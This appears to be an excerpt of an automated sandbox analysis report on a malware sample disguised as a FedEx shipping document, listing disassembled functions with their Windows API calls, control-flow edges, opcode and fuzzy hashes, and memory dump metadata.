                                                                                        • Instruction ID: d3dcf08a2d1a577043e10611a93d772b8858a6471c4326672478692d8e66646c
                                                                                        • Opcode Fuzzy Hash: da11e305dcda2af6e92a2084b3df2f05c89d7cd80371b240aaef4532bdd38583
                                                                                        • Instruction Fuzzy Hash: 2111D6B6D003099FDB50DF9AD844AEEBBF8EB98320F14852AD415A7200C379A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06AAB679 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 711 6aab679-6aab6c0 713 6aab6c8-6aab6f7 LoadLibraryExW 711->713 714 6aab6c2-6aab6c5 711->714 715 6aab6f9-6aab6ff 713->715 716 6aab700-6aab71d 713->716 714->713 715->716
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06AAB659,00000800), ref: 06AAB6EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 3828f9e27e6229829d0bb83ab8a6bd916e5e2ff531df6f9e3d2f6c1b608069aa
                                                                                        • Instruction ID: f0be47742fc9f2ef6fd891aa78df89c5e3376d1ca7d2427a48ef74782cb4cc9e
                                                                                        • Opcode Fuzzy Hash: 3828f9e27e6229829d0bb83ab8a6bd916e5e2ff531df6f9e3d2f6c1b608069aa
                                                                                        • Instruction Fuzzy Hash: B811E4B6D003099FDB10DF9AD884ADEFBF8AB98320F14852AE415B7200C779A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06E3E240 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 719 6e3e240-6e3e2b4 GlobalMemoryStatusEx 721 6e3e2b6-6e3e2bc 719->721 722 6e3e2bd-6e3e2e5 719->722 721->722
                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 06E3E2A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525803702.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6e30000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 0c0ec18a4aab99b2ce2d7d074d7c2dbc8836e48485a7f287feb19f293659dd55
                                                                                        • Instruction ID: 582f4a270f0b0f5a8586d2b833ded773e7348766386959c7db1c82746622f945
                                                                                        • Opcode Fuzzy Hash: 0c0ec18a4aab99b2ce2d7d074d7c2dbc8836e48485a7f287feb19f293659dd55
                                                                                        • Instruction Fuzzy Hash: DE11E4B1C0065A9BCB10CF9AD944BDEFBB8AF48324F14816AD418B7240D778A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9BBEE Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 725 6c9bbee-6c9c1b4 727 6c9c1b5-6c9c212 OleInitialize 725->727 728 6c9c21b-6c9c238 727->728 729 6c9c214-6c9c21a 727->729 729->728
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C9C205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: da87807e53cf0a865f54fe8ba111194ef9dbcdfd8a6537765817e875abfc5e13
                                                                                        • Instruction ID: 4a56d49e675c600d7ffbd8a5e2e2552cadfd7a36513aff940a31c359e66ba8d7
                                                                                        • Opcode Fuzzy Hash: da87807e53cf0a865f54fe8ba111194ef9dbcdfd8a6537765817e875abfc5e13
                                                                                        • Instruction Fuzzy Hash: F01146B1D00708CFCB50CF9AD848B9EBBF8EB58324F14845AD419A7310D378A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9146A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06C914D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 207e96966aaaae685b72739bbcf968e3c30b4480c324d0a5c42f6906cdb385ff
                                                                                        • Instruction ID: 19465ef51aebad733909792d94668cb45cdc9a5c8092497e3eeef4cb18960a51
                                                                                        • Opcode Fuzzy Hash: 207e96966aaaae685b72739bbcf968e3c30b4480c324d0a5c42f6906cdb385ff
                                                                                        • Instruction Fuzzy Hash: 3F11D2B6D0064A8FCB10CF9AD844ADEFBF8EB88324F14855AD429B7600D379A545CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C91470 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06C914D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: eb3d97f4209f5b02a6d8838ba5912598b291dfb3827f8fb08c80da8f8a2c3218
                                                                                        • Instruction ID: 30e92e6010c9c319c657e89a86c04b9af1bf47b49f107addee5c0b8241e49e77
                                                                                        • Opcode Fuzzy Hash: eb3d97f4209f5b02a6d8838ba5912598b291dfb3827f8fb08c80da8f8a2c3218
                                                                                        • Instruction Fuzzy Hash: 7E11E3B5D0064A8FCB10CF9AD844ADEFBF8EB88324F14855AD419B7600D379A545CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9626C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C9895D), ref: 06C9B907
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: d5d49a80b179288df2407d47978c82533b86b53ff2fa32a0499321d341719138
                                                                                        • Instruction ID: 49c458625f5452b93a72e71fd0ca84ab30257f7b8ebc527231982c322649dbdb
                                                                                        • Opcode Fuzzy Hash: d5d49a80b179288df2407d47978c82533b86b53ff2fa32a0499321d341719138
                                                                                        • Instruction Fuzzy Hash: B61136B1800209CFCB50DF9AD888BDEBBF8EB58320F20841AD519B3300C375A944CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9BBFC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C9C205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 9067d63424b7d85d5384a13e194cd3663bdbefc90704674a5561391bee7147b9
                                                                                        • Instruction ID: 72a917886a885d490a486e34374244cf54ad013a421ac0c912ecf47690837934
                                                                                        • Opcode Fuzzy Hash: 9067d63424b7d85d5384a13e194cd3663bdbefc90704674a5561391bee7147b9
                                                                                        • Instruction Fuzzy Hash: DF1103B1D006488FCB50DF9AD848BDEBBF8EB58324F14845AD519A7210D378A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9C1A8 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C9C205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 230dee1fab26ecf5aa0c6b48bb0af5018afda2eca4b38cf4fcc576be59672c02
                                                                                        • Instruction ID: a3a4d9c0526b5f8970eb39daa8d87ad92421fe5e729d39524dc3f91167022a61
                                                                                        • Opcode Fuzzy Hash: 230dee1fab26ecf5aa0c6b48bb0af5018afda2eca4b38cf4fcc576be59672c02
                                                                                        • Instruction Fuzzy Hash: 881127B1D00749CFCB60CF9AD888BCEBBF8EB48324F14855AD519A3600D378A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9C150 Relevance: 1.5, APIs: 1, Instructions: 41comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C9C205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: a8563c09e9ff485aa96abdd919882c5b6dd01d8d05db3c1de30ae5674af3a231
                                                                                        • Instruction ID: d24ee743f3694a8ff12c32b38ab3b71f1d2d276d225def0459c682d8ef7fd58b
                                                                                        • Opcode Fuzzy Hash: a8563c09e9ff485aa96abdd919882c5b6dd01d8d05db3c1de30ae5674af3a231
                                                                                        • Instruction Fuzzy Hash: 261132B1D00648CFCB50CFAAD4887DEBBF4AB58324F20845AD419B3200C378AA44CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9C153 Relevance: 1.5, APIs: 1, Instructions: 38comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 06C9C205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: b1da3ef20e374b9520dc469ee11c51c2de91270198effec4aa74e34b81f53b4e
                                                                                        • Instruction ID: 6a9843847a6fe0f4dad5e6b7f558aae9fb606b00dadccda8bb336efff5cd0c0e
                                                                                        • Opcode Fuzzy Hash: b1da3ef20e374b9520dc469ee11c51c2de91270198effec4aa74e34b81f53b4e
                                                                                        • Instruction Fuzzy Hash: BE0110B5D00208CFDB50CF9AD8487CEBBF4AB58324F24845AD419B7310C378AA84CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D0120 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \
                                                                                        • API String ID: 0-2967466578
                                                                                        • Opcode ID: 783d63ed5d412bb77deb2df2f4166de97cb9c17f91adfaed606154b9269907d2
                                                                                        • Instruction ID: 5d2efff9af1320ba0b41e3f58a67d9816b3f61929c35ac243182444771883ef6
                                                                                        • Opcode Fuzzy Hash: 783d63ed5d412bb77deb2df2f4166de97cb9c17f91adfaed606154b9269907d2
                                                                                        • Instruction Fuzzy Hash: F1812DB0E0130A9FEF64CB98C9847AEB7F5EB49310F504626E449E7351E675DC81CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D0E40 Relevance: .4, Instructions: 360COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1efad87709738a2c762031d1cfed25841151412450b55d745bb8c924eff42aaa
                                                                                        • Instruction ID: 401af62789d33bd0dc9e67b70e6b3f5e0583e1777995b98a04b06e5d4248ac16
                                                                                        • Opcode Fuzzy Hash: 1efad87709738a2c762031d1cfed25841151412450b55d745bb8c924eff42aaa
                                                                                        • Instruction Fuzzy Hash: E8E106B5A002098FDB54CF68D984AAABBF1FF48710F214699E905EB761D731EC41CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D0E30 Relevance: .2, Instructions: 192COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e730356fe4c5bb432abdf340f1006c2cc63ab24cd5d071f45aaeef44d849eff8
                                                                                        • Instruction ID: c3c36324b91fd0f5de2af9adaf9462cc4286689bfe148df68bd695fe9271196b
                                                                                        • Opcode Fuzzy Hash: e730356fe4c5bb432abdf340f1006c2cc63ab24cd5d071f45aaeef44d849eff8
                                                                                        • Instruction Fuzzy Hash: 6181C1B5A002098FCB44CFA8C584A9EBBF1FF49324F258295E509EB361C771EC41CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D05FD Relevance: .2, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57a6aefe6474d5b916d40ed98e0547074b593aa0c9989d949601c9b2ddb3e08f
                                                                                        • Instruction ID: f285d7314f0872b6fa657c26ed8975878c838cde81ba167b52175815e6822b39
                                                                                        • Opcode Fuzzy Hash: 57a6aefe6474d5b916d40ed98e0547074b593aa0c9989d949601c9b2ddb3e08f
                                                                                        • Instruction Fuzzy Hash: DF614BB4B003468FDBA4CF68C490669BBF1FB85310F204A6AE88ADB761D735ED45CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D12F3 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 559bafbaa4d29d88ce17f1993607a940df3024bb3da3339f097469631da5e773
                                                                                        • Instruction ID: 74ab01752476fd8360fa156285bd36a803df78bcc4cd17daa997cc935da5fda3
                                                                                        • Opcode Fuzzy Hash: 559bafbaa4d29d88ce17f1993607a940df3024bb3da3339f097469631da5e773
                                                                                        • Instruction Fuzzy Hash: 70F02BB030834B1BEB710719C8043797BE5DB4A324F1B0633E459C7A41D998DC828755
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D054D Relevance: .0, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 04cc5f1c95f7443aa153102d77ac701a7f509d9d4f5a6777d49f66b87b1eabe0
                                                                                        • Instruction ID: bd319662ef04c8e04dce530263af83503c63a32d18bc562452faa9280baa80e8
                                                                                        • Opcode Fuzzy Hash: 04cc5f1c95f7443aa153102d77ac701a7f509d9d4f5a6777d49f66b87b1eabe0
                                                                                        • Instruction Fuzzy Hash: 930126315157868FCB529F74C81055D3FB1AF82300F0546AAE58ADB192EB35C9548BA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D1300 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ceb7b893dbf5369c2e8f76d7bd6b4ff26324253f97128669193f68d3aac9284
                                                                                        • Instruction ID: 3ce653deafb4f8163dbbc6d6eb81f3dacd089e03e8136debc11cd60a0d04f5cb
                                                                                        • Opcode Fuzzy Hash: 3ceb7b893dbf5369c2e8f76d7bd6b4ff26324253f97128669193f68d3aac9284
                                                                                        • Instruction Fuzzy Hash: 55F0A9B170830A16FB70061DD84833DA6D9D38A724F1A0632E91ACBE81DDD9EC824389
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D12A5 Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e4a4b19cfee910c03f34b16bf52b273cc2d81b4a5b55e4d6ad6ffdc9e413cc6
                                                                                        • Instruction ID: 2e3489e475e0ff64707c5e1ab1994cf855f585cdfb7b84cda86271002aee11d2
                                                                                        • Opcode Fuzzy Hash: 9e4a4b19cfee910c03f34b16bf52b273cc2d81b4a5b55e4d6ad6ffdc9e413cc6
                                                                                        • Instruction Fuzzy Hash: B6E026B170032A8BDF244BA9D444B7A33DDDB0A320F110522E805CB350E943DC9183C4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D12A8 Relevance: .0, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af50c57f0164cd6fae312121959a7848c16e017b79284e4692661f7e426c74c0
                                                                                        • Instruction ID: 5d6f1ec177c0f47116b3aa811ceb927cbb5ae7b9b0e5711f49d6403fb16dcd74
                                                                                        • Opcode Fuzzy Hash: af50c57f0164cd6fae312121959a7848c16e017b79284e4692661f7e426c74c0
                                                                                        • Instruction Fuzzy Hash: F9E0C2B170432A8BDF2457A9D594B7A33DDDB09324F120672E906CB351ED87DC9183C5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%